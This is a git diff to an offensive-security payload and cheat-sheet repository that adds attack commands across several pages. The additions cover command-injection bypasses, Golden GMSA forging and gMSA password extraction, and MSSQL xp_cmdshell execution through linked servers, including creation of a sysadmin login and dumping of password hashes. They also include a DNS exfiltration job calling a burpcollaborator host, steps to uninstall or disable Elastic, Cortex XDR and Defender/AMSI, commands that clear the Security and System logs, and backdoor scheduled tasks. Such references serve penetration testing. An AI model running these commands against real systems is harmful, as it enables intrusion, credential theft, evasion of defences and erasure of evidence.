diff --git a/API Key Leaks/README.md b/API Key Leaks/README.md index acfb662e..8438d2c4 100644 --- a/API Key Leaks/README.md +++ b/API Key Leaks/README.md @@ -25,6 +25,13 @@ - [KeyFinder - is a tool that let you find keys while surfing the web!](https://github.com/momenbasel/KeyFinder) - [Keyhacks - is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid.](https://github.com/streaak/keyhacks) +- [truffleHog - Find credentials all over the place](https://github.com/trufflesecurity/truffleHog) + ```ps1 + docker run -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --repo https://github.com/trufflesecurity/test_keys + docker run -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --org=trufflesecurity + trufflehog git https://github.com/trufflesecurity/trufflehog.git + trufflehog github --endpoint https://api.github.com --org trufflesecurity --token GITHUB_TOKEN --debug --concurrency 2 + ``` ## Exploit diff --git a/AWS Amazon Bucket S3/README.md b/AWS Amazon Bucket S3/README.md index 97b1fd62..5abe5f91 100644 --- a/AWS Amazon Bucket S3/README.md +++ b/AWS Amazon Bucket S3/README.md @@ -52,6 +52,7 @@ By default the name of Amazon Bucket are like http://s3.amazonaws.com/[bucket_na http://s3.amazonaws.com/[bucket_name]/ http://[bucket_name].s3.amazonaws.com/ http://flaws.cloud.s3.amazonaws.com/ +https://buckets.grayhatwarfare.com/ ``` Their names are also listed if the listing is enabled. diff --git a/Account Takeover/README.md b/Account Takeover/README.md index 8bc027e6..23afbe20 100644 --- a/Account Takeover/README.md +++ b/Account Takeover/README.md 
@@ -10,6 +10,7 @@ * [Weak Password Reset Token](#weak-password-reset-token) * [Leaking Password Reset Token](#leaking-password-reset-token) * [Password Reset Via Username Collision](#password-reset-via-username-collision) + * [Account takeover due to unicode normalization issue](#account-takeover-due-to-unicode-normalization-issue) * [Account Takeover Via Cross Site Scripting](#account-takeover-via-cross-site-scripting) * [Account Takeover Via HTTP Request Smuggling](#account-takeover-via-http-request-smuggling) * [Account Takeover via CSRF](#account-takeover-via-csrf) @@ -116,6 +117,13 @@ Try to determine if the token expire or if it's always the same, in some cases t The platform CTFd was vulnerable to this attack. See: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245) + +### Account takeover due to unicode normalization issue + +- Victim account: `demo@gmail.com` +- Attacker account: `demⓞ@gmail.com` + + ## Account Takeover Via Cross Site Scripting 1. Find an XSS inside the application or a subdomain if the cookies are scoped to the parent domain : `*.domain.com` diff --git a/Command Injection/README.md b/Command Injection/README.md index 9df048ad..e98534ae 100644 --- a/Command Injection/README.md +++ b/Command Injection/README.md @@ -18,6 +18,7 @@ * [Bypass with double quote](#bypass-with-double-quote) * [Bypass with backslash and slash](#bypass-with-backslash-and-slash) * [Bypass with $@](#bypass-with-) + * [Bypass with $()](#bypass-with--1) * [Bypass with variable expansion](#bypass-with-variable-expansion) * [Bypass with wildcards](#bypass-with-wildcards) * [Challenge](#challenge) @@ -209,6 +210,13 @@ echo $0 echo whoami|$0 ``` +### Bypass with $() +```powershell +who$()ami +who$(echo am)i +who`echo am`i +``` + #### Bypass with variable expansion ```powershell diff --git a/Directory Traversal/README.md b/Directory Traversal/README.md index e459021e..665af6c1 100644 --- a/Directory Traversal/README.md +++ b/Directory Traversal/README.md 
@@ -99,6 +99,16 @@ To bypass this behaviour just add forward slashes in front of the url: ```http://nginx-server////////../../``` +### Java Bypass + +Bypass Java's URL protocol + +```powershell +url:file:///etc/passwd +url:http://127.0.0.1:8080 +``` + + ## Path Traversal ### Interesting Linux files diff --git a/Insecure Deserialization/Python.md b/Insecure Deserialization/Python.md index 41887f65..563db1cf 100644 --- a/Insecure Deserialization/Python.md +++ b/Insecure Deserialization/Python.md @@ -3,6 +3,7 @@ ## Pickle The following code is a simple example of using `cPickle` in order to generate an auth_token which is a serialized User object. +:warning: `import cPickle` will only work on Python 2 ```python import cPickle @@ -32,7 +33,7 @@ Python 2.7 documentation clearly states Pickle should never be used with untrust > The pickle module is not secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source. ```python -import cPickle +import cPickle, os from base64 import b64encode, b64decode class Evil(object): @@ -47,4 +48,4 @@ print("Your Evil Token : {}").format(evil_token) ## References * [Exploiting misuse of Python's "pickle" - Mar 20, 2011](https://blog.nelhage.com/2011/03/exploiting-pickle/) -* [Python Pickle Injection - Apr 30, 2017](http://xhyumiracle.com/python-pickle-injection/) \ No newline at end of file +* [Python Pickle Injection - Apr 30, 2017](http://xhyumiracle.com/python-pickle-injection/) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index ef838643..527b4f82 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md 
@@ -48,6 +48,7 @@ - [Password in AD User comment](#password-in-ad-user-comment) - [Reading LAPS Password](#reading-laps-password) - [Reading GMSA Password](#reading-gmsa-password) + - [Forging Golden GMSA](#forging-golden-gmsa) - [Pass-the-Ticket Golden Tickets](#pass-the-ticket-golden-tickets) - [Using Mimikatz](#using-mimikatz) - [Using Meterpreter](#using-meterpreter) @@ -1264,9 +1265,9 @@ lsadump::lsa /inject /name:krbtgt Useful when you want to have the clear text password or when you need to make stats about weak passwords. Recommended wordlists: -- rockyou (available in Kali Linux) -- Have I Been Pwned founds (https://hashmob.net/hashlists/info/4169-Have%20I%20been%20Pwned%20V8%20(NTLM)) -- Weakpass.com +- [Rockyou.txt](https://weakpass.com/wordlist/90) +- [Have I Been Pwned founds](https://hashmob.net/hashlists/info/4169-Have%20I%20been%20Pwned%20V8%20(NTLM)) +- [Weakpass.com](https://weakpass.com/) - Read More at [Methodology and Resources/Hash Cracking.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md) ```powershell @@ -1282,7 +1283,6 @@ $ python2 maskgen.py hashcat.mask --targettime 3600 --optindex -q -o hashcat_1H. ``` :warning: If the password is not a confidential data (challenges/ctf), you can use online "cracker" like : -- ~~[hashes.org](https://hashes.org/check.php)~~ - [hashmob.net](https://hashmob.net) - [crackstation.net](https://crackstation.net) - [hashes.com](https://hashes.com/en/decrypt/hash) 
@@ -1390,40 +1390,7 @@ or dump the Active Directory and `grep` the content. ldapdomaindump -u 'DOMAIN\john' -p MyP@ssW0rd 10.10.10.10 -o ~/Documents/AD_DUMP/ ``` -### Reading GMSA Password -> User accounts created to be used as service accounts rarely have their password changed. Group Managed Service Accounts (GMSAs) provide a better approach (starting in the Windows 2012 timeframe). The password is managed by AD and automatically changed. - -#### GMSA Attributes in the Active Directory -* `msDS-GroupMSAMembership` (`PrincipalsAllowedToRetrieveManagedPassword`) - stores the security principals that can access the GMSA password. -* `msds-ManagedPassword` - This attribute contains a BLOB with password information for group-managed service accounts. -* `msDS-ManagedPasswordId` - This constructed attribute contains the key identifier for the current managed password data for a group MSA. -* `msDS-ManagedPasswordInterval` - This attribute is used to retrieve the number of days before a managed password is automatically changed for a group MSA. 
- - -#### Extract NT hash from the Active Directory - -* [GMSAPasswordReader](https://github.com/rvazarkar/GMSAPasswordReader) (C#) - ```ps1 - # https://github.com/rvazarkar/GMSAPasswordReader - GMSAPasswordReader.exe --accountname SVC_SERVICE_ACCOUNT - ``` - -* [gMSADumper (Python)](https://github.com/micahvandeusen/gMSADumper) - ```powershell - # https://github.com/micahvandeusen/gMSADumper - python3 gMSADumper.py -u User -p Password1 -d domain.local - ``` - -* Active Directory Powershell - ```ps1 - $gmsa = Get-ADServiceAccount -Identity 'SVC_SERVICE_ACCOUNT' -Properties 'msDS-ManagedPassword' - $blob = $gmsa.'msDS-ManagedPassword' - $mp = ConvertFrom-ADManagedPasswordBlob $blob - $hash1 = ConvertTo-NTHash -Password $mp.SecureCurrentPassword - ``` - -* [gMSA_Permissions_Collection.ps1](https://gist.github.com/kdejoyce/f0b8f521c426d04740148d72f5ea3f6f#file-gmsa_permissions_collection-ps1) based on Active Directory PowerShell module ### Reading LAPS Password @@ -1471,7 +1438,7 @@ Get-AuthenticodeSignature 'c:\program files\LAPS\CSE\Admpwd.dll' foreach ($objResult in $colResults){$objComputer = $objResult.Properties; $objComputer.name|where {$objcomputer.name -ne $env:computername}|%{foreach-object {Get-AdmPwdPassword -ComputerName $_}}} ``` - - From linux: + - From Linux: * [pyLAPS](https://github.com/p0dalirius/pyLAPS) to **read** and **write** LAPS passwords: ```bash 
@@ -1497,6 +1464,68 @@ Get-AuthenticodeSignature 'c:\program files\LAPS\CSE\Admpwd.dll' ldapsearch -x -h  -D "@" -w  -b "dc=<>,dc=<>,dc=<>" "(&(objectCategory=computer)(ms-MCS-AdmPwd=*))" ms-MCS-AdmPwd` ``` + +### Reading GMSA Password + +> User accounts created to be used as service accounts rarely have their password changed. Group Managed Service Accounts (GMSAs) provide a better approach (starting in the Windows 2012 timeframe). The password is managed by AD and automatically rotated every 30 days to a randomly generated password of 256 bytes. + +#### GMSA Attributes in the Active Directory +* `msDS-GroupMSAMembership` (`PrincipalsAllowedToRetrieveManagedPassword`) - stores the security principals that can access the GMSA password. +* `msds-ManagedPassword` - This attribute contains a BLOB with password information for group-managed service accounts. +* `msDS-ManagedPasswordId` - This constructed attribute contains the key identifier for the current managed password data for a group MSA. +* `msDS-ManagedPasswordInterval` - This attribute is used to retrieve the number of days before a managed password is automatically changed for a group MSA. 
+ + +#### Extract NT hash from the Active Directory + +* [GMSAPasswordReader](https://github.com/rvazarkar/GMSAPasswordReader) (C#) + ```ps1 + # https://github.com/rvazarkar/GMSAPasswordReader + GMSAPasswordReader.exe --accountname SVC_SERVICE_ACCOUNT + ``` + +* [gMSADumper (Python)](https://github.com/micahvandeusen/gMSADumper) + ```powershell + # https://github.com/micahvandeusen/gMSADumper + python3 gMSADumper.py -u User -p Password1 -d domain.local + ``` + +* Active Directory Powershell + ```ps1 + $gmsa = Get-ADServiceAccount -Identity 'SVC_SERVICE_ACCOUNT' -Properties 'msDS-ManagedPassword' + $blob = $gmsa.'msDS-ManagedPassword' + $mp = ConvertFrom-ADManagedPasswordBlob $blob + $hash1 = ConvertTo-NTHash -Password $mp.SecureCurrentPassword + ``` + +* [gMSA_Permissions_Collection.ps1](https://gist.github.com/kdejoyce/f0b8f521c426d04740148d72f5ea3f6f#file-gmsa_permissions_collection-ps1) based on Active Directory PowerShell module + + +### Forging Golden GMSA + +> One notable difference between a **Golden Ticket** attack and the **Golden GMSA** attack is that they no way of rotating the KDS root key secret. Therefore, if a KDS root key is compromised, there is no way to protect the gMSAs associated with it. 
+ +* Using [GoldenGMSA](https://github.com/Semperis/GoldenGMSA) + ```ps1 + # Enumerate all gMSAs + GoldenGMSA.exe gmsainfo + # Query for a specific gMSA + GoldenGMSA.exe gmsainfo --sid S-1-5-21-1437000690-1664695696-1586295871-1112 + + # Dump all KDS Root Keys + GoldenGMSA.exe kdsinfo + # Dump a specific KDS Root Key + GoldenGMSA.exe kdsinfo --guid 46e5b8b9-ca57-01e6-e8b9-fbb267e4adeb + + # Compute gMSA password + # --sid : SID of the gMSA (required) + # --kdskey : Base64 encoded KDS Root Key + # --pwdid : Base64 of msds-ManagedPasswordID attribute value + GoldenGMSA.exe compute --sid S-1-5-21-1437000690-1664695696-1586295871-1112 # requires privileged access to the domain + GoldenGMSA.exe compute --sid S-1-5-21-1437000690-1664695696-1586295871-1112 --kdskey AQAAALm45UZXyuYB[...]G2/M= # requires LDAP access + GoldenGMSA.exe compute --sid S-1-5-21-1437000690-1664695696-1586295871-1112 --kdskey AQAAALm45U[...]SM0R7djG2/M= --pwdid AQAAA[..]AAA # Offline mode + ``` + ### Pass-the-Ticket Golden Tickets Forging a TGT require the `krbtgt` NTLM hash @@ -3556,3 +3585,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [The Kerberos Key List Attack: The return of the Read Only Domain Controllers - Leandro Cuozzo](https://www.secureauth.com/blog/the-kerberos-key-list-attack-the-return-of-the-read-only-domain-controllers/) * [AD CS: weaponizing the ESC7 attack - Kurosh Dabbagh - 26 January, 2022](https://www.blackarrow.net/adcs-weaponizing-esc7-attack/) * [AD CS: from ManageCA to RCE - 11 February, 2022 - Pablo Martínez, Kurosh Dabbagh](https://www.blackarrow.net/ad-cs-from-manageca-to-rce/) +* [Introducing the Golden GMSA Attack - YUVAL GORDON - March 01, 2022](https://www.semperis.com/blog/golden-gmsa-attack/) \ No newline at end of file diff --git a/Methodology and Resources/Cloud - Azure Pentest.md b/Methodology and Resources/Cloud - Azure Pentest.md index ca9c9e0c..65dc4d77 100644 --- a/Methodology and Resources/Cloud - Azure Pentest.md 
+++ b/Methodology and Resources/Cloud - Azure Pentest.md @@ -13,6 +13,10 @@ * [Enumeration methodology](#enumeration-methodology) * [Phishing with Evilginx2](#phishing-with-evilginx2) * [Illicit Consent Grant](#illicit-consent-grant) + * [Register Application](#register-application) + * [Configure Application](#configure-application) + * [Setup 365-Stealer (Deprecated)](#setup-365-stealer-deprecated) + * [Setup Vajra](#setup-vajra) * [Device Code Phish](#device-code-phish) * [Token from Managed Identity](#token-from-managed-identity) * [Azure API via Powershell](#azure-api-via-powershell) @@ -396,7 +400,7 @@ Check if users are allowed to consent to apps: `PS AzureADPreview> (GetAzureADMS * User.ReadBasic.All * User.Read -### Setup 365-Stealer +### Setup 365-Stealer (Deprecated) :warning: Default port for 365-Stealer phishing is 443 @@ -425,6 +429,10 @@ Check if users are allowed to consent to apps: `PS AzureADPreview> (GetAzureADMS - `--refresh-token XXX --client-id YYY --client-secret ZZZ`: use a refresh token - Find the Phishing URL: go to `https://:` and click on **Read More** button or in the console. +### Setup Vajra + +> Vajra is a UI-based tool with multiple techniques for attacking and enumerating in the target's Azure environment. It features an intuitive web-based user interface built with the Python Flask module for a better user experience. The primary focus of this tool is to have different attacking techniques all at one place with web UI interfaces. - https://github.com/TROUBLE-1/Vajra + **Mitigation**: Enable `Do not allow user consent` for applications in the "Consent and permissions menu". diff --git a/Methodology and Resources/MSSQL Server - Cheatsheet.md b/Methodology and Resources/MSSQL Server - Cheatsheet.md index 485649ac..860d5b0f 100644 --- a/Methodology and Resources/MSSQL Server - Cheatsheet.md +++ b/Methodology and Resources/MSSQL Server - Cheatsheet.md 
@@ -14,6 +14,8 @@ * [Gather 5 Entries from a Specific Table](#gather-5-entries-from-a-specific-table) * [Dump common information from server to files](#dump-common-information-from-server-to-files) * [Linked Database](#linked-database) + * [Find Trusted Link](#find-trusted-link) + * [Execute Query Through The Link](#execute-query-through-the-link) * [Crawl Links for Instances in the Domain](#crawl-links-for-instances-in-the-domain) * [Crawl Links for a Specific Instance](#crawl-links-for-a-specific-instance) * [Query Version of Linked Database](#query-version-of-linked-database) @@ -22,7 +24,7 @@ * [Determine All the Tables Names from a Selected Linked Database](#determine-all-the-tables-names-from-a-selected-linked-database) * [Gather the Top 5 Columns from a Selected Linked Table](#gather-the-top-5-columns-from-a-selected-linked-table) * [Gather Entries from a Selected Linked Column](#gather-entries-from-a-selected-linked-column) - * [Command Execution via xp_cmdshell](#command-execution-via-xp_cmdshell) +* [Command Execution via xp_cmdshell](#command-execution-via-xp_cmdshell) * [Extended Stored Procedure](#extended-stored-procedure) * [Add the extended stored procedure and list extended stored procedures](#add-the-extended-stored-procedure-and-list-extended-stored-procedures) * [CLR Assemblies](#clr-assemblies) @@ -54,6 +56,7 @@ * [Find SQL Server Logins Which can be Impersonated for the Current Database](#find-sql-server-logins-which-can-be-impersonated-for-the-current-database) * [Exploiting Impersonation](#exploiting-impersonation) * [Exploiting Nested Impersonation](#exploiting-nested-impersonation) + * [MSSQL Accounts and Hashes](#mssql-accounts-and-hashes) * [References](#references) ## Identify Instances and Databases 
@@ -129,6 +132,31 @@ Invoke-SQLDumpInfo -Verbose -Instance SQLSERVER1\Instance1 -csv ## Linked Database +### Find Trusted Link + +```sql +select * from master..sysservers +``` + +### Execute Query Through The Link + +```sql +-- execute query through the link +select * from openquery("dcorp-sql1", 'select * from master..sysservers') +select version from openquery("linkedserver", 'select @@version as version'); + +-- chain multiple openquery +select version from openquery("link1",'select version from openquery("link2","select @@version as version")') + +-- execute shell commands +EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT LinkedServer +select 1 from openquery("linkedserver",'select 1;exec master..xp_cmdshell "dir c:"') + +-- create user and give admin privileges +EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2" +EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2" +``` + ### Crawl Links for Instances in the Domain A Valid Link Will Be Identified by the DatabaseLinkName Field in the Results 
@@ -194,28 +222,63 @@ Get-SQLQuery -Instance "" -Query "select * from openque ``` -### Command Execution via xp_cmdshell +## Command Execution via xp_cmdshell > xp_cmdshell disabled by default since SQL Server 2005 ```ps1 -Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "" -Command whoami -Creates and adds local user backup to the local administrators group: -Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "" -Command "net user backup Password1234 /add' -Verbose -Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "" -Command "net localgroup administrators backup /add" -Verbose +PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "" -Command whoami + +# Creates and adds local user backup to the local administrators group: +PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "" -Command "net user backup Password1234 /add'" -Verbose +PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "" -Command "net localgroup administrators backup /add" -Verbose ``` +* Manually execute the SQL query + ```sql + EXEC xp_cmdshell "net user"; + EXEC master..xp_cmdshell 'whoami' + EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'; + EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1'; + ``` +* If you need to reactivate xp_cmdshell (disabled by default in SQL Server 2005) + ```sql + EXEC sp_configure 'show advanced options',1; + RECONFIGURE; + EXEC sp_configure 'xp_cmdshell',1; + RECONFIGURE; + ``` +* If the procedure was uninstalled + ```sql + sp_addextendedproc 'xp_cmdshell','xplog70.dll' + ``` + + ## Extended Stored Procedure ### Add the extended stored procedure and list extended stored procedures ```ps1 +# Create evil DLL Create-SQLFileXpDll -OutFile C:\temp\test.dll -Command "echo test > c:\temp\test.txt" -ExportName xp_test + +# Load the DLL and call xp_test Get-SQLQuery -UserName sa -Password Password1234 -Instance "" -Query "sp_addextendedproc 'xp_test', '\\10.10.0.1\temp\test.dll'" 
Get-SQLQuery -UserName sa -Password Password1234 -Instance "" -Query "EXEC xp_test" + +# Listing existing Get-SQLStoredProcedureXP -Instance "" -Verbose ``` +* Build a DLL using [xp_evil_template.cpp](https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/xp_evil_template.cpp) +* Load the DLL + ```sql + -- can also be loaded from UNC path or Webdav + sp_addextendedproc 'xp_calc', 'C:\mydll\xp_calc.dll' + EXEC xp_calc + sp_dropextendedproc 'xp_calc' + ``` + ## CLR Assemblies Prerequisites: @@ -321,6 +384,8 @@ GO ## OLE Automation +* :warning: Disabled by default + ### Execute commands using OLE automation procedures ```ps1 @@ -364,9 +429,22 @@ Subsystem Options: –Subsystem Jscript ``` +```sql +USE msdb; +EXEC dbo.sp_add_job @job_name = N'test_powershell_job1'; +EXEC sp_add_jobstep @job_name = N'test_powershell_job1', @step_name = N'test_powershell_name1', @subsystem = N'PowerShell', @command = N'$name=$env:COMPUTERNAME[10];nslookup "$name.redacted.burpcollaborator.net"', @retry_attempts = 1, @retry_interval = 5 ; +EXEC dbo.sp_add_jobserver @job_name = N'test_powershell_job1'; +EXEC dbo.sp_start_job N'test_powershell_job1'; + +-- delete +EXEC dbo.sp_delete_job @job_name = N'test_powershell_job1'; +``` + ### List All Jobs ```ps1 +SELECT job_id, [name] FROM msdb.dbo.sysjobs; +SELECT job.job_id, notify_level_email, name, enabled, description, step_name, command, server, database_name FROM msdb.dbo.sysjobs job INNER JOIN msdb.dbo.sysjobsteps steps ON job.job_id = steps.job_id Get-SQLAgentJob -Instance "" -username sa -Password Password1234 -Verbose ``` 
@@ -537,8 +615,30 @@ SELECT ORIGINAL_LOGIN() SELECT SYSTEM_USER ``` +### MSSQL Accounts and Hashes + +```sql +MSSQL 2000: +SELECT name, password FROM master..sysxlogins +SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins (Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.) + +MSSQL 2005 +SELECT name, password_hash FROM master.sys.sql_logins +SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins +``` + +Then crack passwords using Hashcat : `hashcat -m 1731 -a 0 mssql_hashes_hashcat.txt /usr/share/wordlists/rockyou.txt --force` + +```ps1 +131 MSSQL (2000) 0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578 +132 MSSQL (2005) 0x010018102152f8f28c8499d8ef263c53f8be369d799f931b2fbe +1731 MSSQL (2012, 2014) 0x02000102030434ea1b17802fd95ea6316bd61d2c94622ca3812793e8fb1672487b5c904a45a31b2ab4a78890d563d2fcf5663e46fe797d71550494be50cf4915d3f4d55ec375 +``` + + ## References * [PowerUpSQL Cheat Sheet & SQL Server Queries - Leo Pitt](https://medium.com/@D00MFist/powerupsql-cheat-sheet-sql-server-queries-40e1c418edc3) * [PowerUpSQL Cheat Sheet - Scott Sutherland](https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet) -* [Attacking SQL Server CLR Assemblies - Scott Sutherland - July 13th, 2017](https://blog.netspi.com/attacking-sql-server-clr-assemblies/) \ No newline at end of file +* [Attacking SQL Server CLR Assemblies - Scott Sutherland - July 13th, 2017](https://blog.netspi.com/attacking-sql-server-clr-assemblies/) +* [MSSQL Agent Jobs for Command Execution - Nicholas Popovich - September 21, 2016](https://www.optiv.com/explore-optiv-insights/blog/mssql-agent-jobs-command-execution) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index 5e3c9a21..8154ab57 100644 --- a/Methodology and Resources/Windows - Persistence.md 
+++ b/Methodology and Resources/Windows - Persistence.md @@ -8,6 +8,7 @@ * [Antivirus Removal](#antivirus-removal) * [Disable Windows Defender](#disable-windows-defender) * [Disable Windows Firewall](#disable-windows-firewall) + * [Clear System and Security Logs](#clear-system-and-security-logs) * [Simple User](#simple-user) * [Registry HKCU](#registry-hkcu) * [Startup](#startup) @@ -31,6 +32,7 @@ * [sethc.exe](#sethc.exe) * [Remote Desktop Services Shadowing](#remote-desktop-services-shadowing) * [Skeleton Key](#skeleton-key) + * [Virtual Machines](#virtual-machines) * [Domain](#domain) * [Golden Certificate](#golden-certificate) * [Golden Ticket](#golden-ticket) 
@@ -55,6 +57,34 @@ PS> attrib +h mimikatz.exe * [Sophos Removal Tool.ps1](https://github.com/ayeskatalas/Sophos-Removal-Tool/) * [Symantec CleanWipe](https://knowledge.broadcom.com/external/article/178870/download-the-cleanwipe-removal-tool-to-u.html) +* [Elastic EDR/Security](https://www.elastic.co/guide/en/fleet/current/uninstall-elastic-agent.html) + ```ps1 + cd "C:\Program Files\Elastic\Agent\" + PS C:\Program Files\Elastic\Agent> .\elastic-agent.exe uninstall + Elastic Agent will be uninstalled from your system at C:\Program Files\Elastic\Agent. Do you want to continue? [Y/n]:Y + Elastic Agent has been uninstalled. + ``` +* [Cortex XDR](https://mrd0x.com/cortex-xdr-analysis-and-bypass/) + ```ps1 + # Global uninstall password: Password1 + Password hash is located in C:\ProgramData\Cyvera\LocalSystem\Persistence\agent_settings.db + Look for PasswordHash, PasswordSalt or password, salt strings. + + # Disable Cortex: Change the DLL to a random value, then REBOOT + reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CryptSvc\Parameters /t REG_EXPAND_SZ /v ServiceDll /d nothing.dll /f + + # Disables the agent on startup (requires reboot to work) + cytool.exe startup disable + + # Disables protection on Cortex XDR files, processes, registry and services + cytool.exe protect disable + + # Disables Cortex XDR (Even with tamper protection enabled) + cytool.exe runtime disable + + # Disables event collection + cytool.exe event_collection disable + ``` ### Disable Windows Defender 
@@ -64,19 +94,30 @@ sc config WinDefend start= disabled sc stop WinDefend Set-MpPreference -DisableRealtimeMonitoring $true -# Wipe currently stored definitions -# Location of MpCmdRun.exe: C:\ProgramData\Microsoft\Windows Defender\Platform\ -MpCmdRun.exe -RemoveDefinitions -All - ## Exclude a process / location Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe" Add-MpPreference -ExclusionProcess 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath C:\Video, C:\install +# Disable scanning all downloaded files and attachments, disable AMSI (reactive) +PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus +PS C:\> Set-MpPreference -DisableIOAVProtection $true +# Disable AMSI (set to 0 to enable) +PS C:\> Set-MpPreference -DisableScriptScanning 1 + # Blind ETW Windows Defender: zero out registry values corresponding to its ETW sessions reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f + +# Wipe currently stored definitions +# Location of MpCmdRun.exe: C:\ProgramData\Microsoft\Windows Defender\Platform\ +MpCmdRun.exe -RemoveDefinitions -All + +# Remove signatures (if Internet connection is present, they will be downloaded again): +PS > & "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -RemoveDefinitions -All +PS > & "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All ``` + ### Disable Windows Firewall ```powershell @@ -87,6 +128,13 @@ NetSh Advfirewall set allprofiles state off New-NetFirewallRule -Name morph3inbound -DisplayName morph3inbound -Enabled True -Direction Inbound -Protocol ANY -Action Allow -Profile ANY -RemoteAddress ATTACKER_IP ``` +### Clear System and Security Logs + +```powershell +cmd.exe /c wevtutil.exe cl System +cmd.exe /c wevtutil.exe cl Security +``` + ## Simple User Set a file as hidden 
@@ -138,36 +186,38 @@ SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" - ### Scheduled Tasks User -Using native **schtask** +* Using native **schtask** - Create a new task + ```powershell + # Create the scheduled tasks to run once at 00.00 + schtasks /create /sc ONCE /st 00:00 /tn "Device-Synchronize" /tr C:\Temp\revshell.exe + # Force run it now ! + schtasks /run /tn "Device-Synchronize" + ``` +* Using native **schtask** - Leverage the `schtasks /change` command to modify existing scheduled tasks + ```powershell + # Launch an executable by calling the ShellExec_RunDLL function. + SCHTASKS /Change /tn "\Microsoft\Windows\PLA\Server Manager Performance Monitor" /TR "C:\windows\system32\rundll32.exe SHELL32.DLL,ShellExec_RunDLLA C:\windows\system32\msiexec.exe /Z c:\programdata\S-1-5-18.dat" /RL HIGHEST /RU "" /ENABLE + ``` -```powershell -# Create the scheduled tasks to run once at 00.00 -schtasks /create /sc ONCE /st 00:00 /tn "Device-Synchronize" /tr C:\Temp\revshell.exe -# Force run it now ! 
-schtasks /run /tn "Device-Synchronize" -``` +* Using Powershell + ```powershell + PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe" + PS C:\> $T = New-ScheduledTaskTrigger -AtLogOn -User "Rasta" + PS C:\> $P = New-ScheduledTaskPrincipal "Rasta" + PS C:\> $S = New-ScheduledTaskSettingsSet + PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S + PS C:\> Register-ScheduledTask Backdoor -InputObject $D + ``` -Using Powershell +* Using SharPersist + ```powershell + # Add to a current scheduled task + SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add -```powershell -PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe" -PS C:\> $T = New-ScheduledTaskTrigger -AtLogOn -User "Rasta" -PS C:\> $P = New-ScheduledTaskPrincipal "Rasta" -PS C:\> $S = New-ScheduledTaskSettingsSet -PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S -PS C:\> Register-ScheduledTask Backdoor -InputObject $D -``` - -Using SharPersist - -```powershell -# Add to a current scheduled task -SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add - -# Add new task -SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -o hourly -``` + # Add new task + SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add + SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -o hourly + ``` ### BITS Jobs 
